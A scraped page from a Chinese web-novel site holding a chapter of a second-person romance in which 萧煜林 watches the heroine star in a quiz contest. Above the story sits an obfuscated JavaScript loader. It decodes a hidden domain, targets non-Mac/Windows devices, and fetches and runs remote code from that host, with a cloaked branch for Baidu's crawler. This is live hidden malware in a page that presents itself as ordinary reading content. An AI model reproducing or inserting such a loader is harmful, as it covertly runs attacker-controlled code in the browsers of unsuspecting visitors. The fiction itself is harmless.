98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
没有了

四十七(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

萧煜林很自然地走进你的房间,放下了手中提着的便食物品,淡淡留下一句不算警告的警告,然后施施然转身离去。

萧煜林得承认,一开始他确实对你很好奇。

萧煜林一向习惯把控局势,所以他一下就察觉到了。

从柏彦琮那时对你的报复开始,身边性格各异却又都或显或隐矜傲不驯的朋友们,一个接着一个,逐渐向你靠拢。

宛如山中异兽们嗅探到了一支独特的蔷薇花一般,因为世间仅有,所以想要抓住,想要独占,又因为棱刺分明,而不敢妄动。

不得不承认,他也有一点。

探查不清的背景,忽明忽暗的存在,时高时低的表现,还有你身上那股特殊的气质,这些都构造成了你奇异的吸引力。

不过最惹他注意的,是那与他相同的气息。

那气息到底是什么,他说不清楚,只觉得,你应该和他结伴,因为你们都天生就是领导平凡前行的人——虽然萧煜林身边从来不缺人。

陆风可以算是萧煜林的一个朋友,封礼,则是他的同伴,还有恪尽职守的助理,为家族谋利的同党,等等等等,但他们都不是萧煜林的同类。

所以他很愉悦看见了你。

但是现在。

气息还存在,只是他突然觉得一阵无味。

你是有些聪明,但那只局限于充满学生气的校园里。而当你试图利用这点灵光来踏足不属于你的领域,尤其是择人即噬如泥沼般的商政时,就显得有些清高自大,愚笨的好笑。

萧煜林已经出言提醒过,但你的好奇心,以及,保护欲,太过旺盛。

既然如此,他只好继续抽出些许精力,稍微应付一下你。

昨晚在召集参赛的你们几人开会时,萧煜林是这么想的。

今早领你们在选手席坐下,他转身迈步向观众席坐下时,想法仍没有变。

萧煜林坐在那儿,看着第一轮比赛进行到一半,耳边时不时传来身旁几人意味不明含沙射影的聊天,手指又在膝盖上敲击起来,带着点不耐。

结果枪口马上就转向了他

“萧会长,你说,是也不是?”

萧煜林并不打算回话,他抬眼看向台上你同样百无聊赖的身影。

即使没有上网,萧煜林也大概能想象到平台上观赛的人对你不太正向的讨论。

但他只是将食指交叉平放在腹部,面色冷淡,安静地坐着。

这都是因为他将参赛资格“给”了你,所以观众对他的期待就被转移到了你身上,如果你回应不了,只能接受反噬。

这是你答应参赛的那一刻就应该知晓的道理。

不管你的目的是什么,你都不能再藏拙。

你是聪明的,答题的数量应该不会比杨欣淇少。

但后面的题并不容易随意抢答。

所以,你会怎么做呢?

然后你就表演给他看了。

是的,表演。

本应激烈竞争的赛台,完全成为了独属于你的个人秀。你就像作一副艺术画一般,随心所欲,无视所有俗世目光,陶醉沉浸,只自顾自的挥洒你的才华和智力,不再遮掩,竭力绽放,完全不顾这光芒会有多么刺痛平凡之人的眼睛。

你蜜棕色的眼瞳被镤闪的星光照成了流动的蜜糖,清丽的面孔华彩万丈。

萧煜林冷淡不耐的神色已经消失。

他甚至不禁露出了愣怔,然而察觉了表情失仪,他也没办法,没心思去继续保持矜持淡漠,端住那种贵族的仪态。

不过也没人再关注他。

萧煜林四下扫视,家世各异却又都举足轻重的人们,眼里或惊讶,或崇拜,或惊艳,或恍惚,但所有人都目光如炬,只盯向台上那一个人。

所有人都注目于你。

包括他身旁之前还在喋喋不休的几人。

包括选手席上本应该是你竞争对手的人。

而他,萧煜林,就这样睁眼看着。

作为一名只能为天才鼓掌的旁观者,

见证这一刻少女的封神。

——————————

上一页
目录
没有了
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间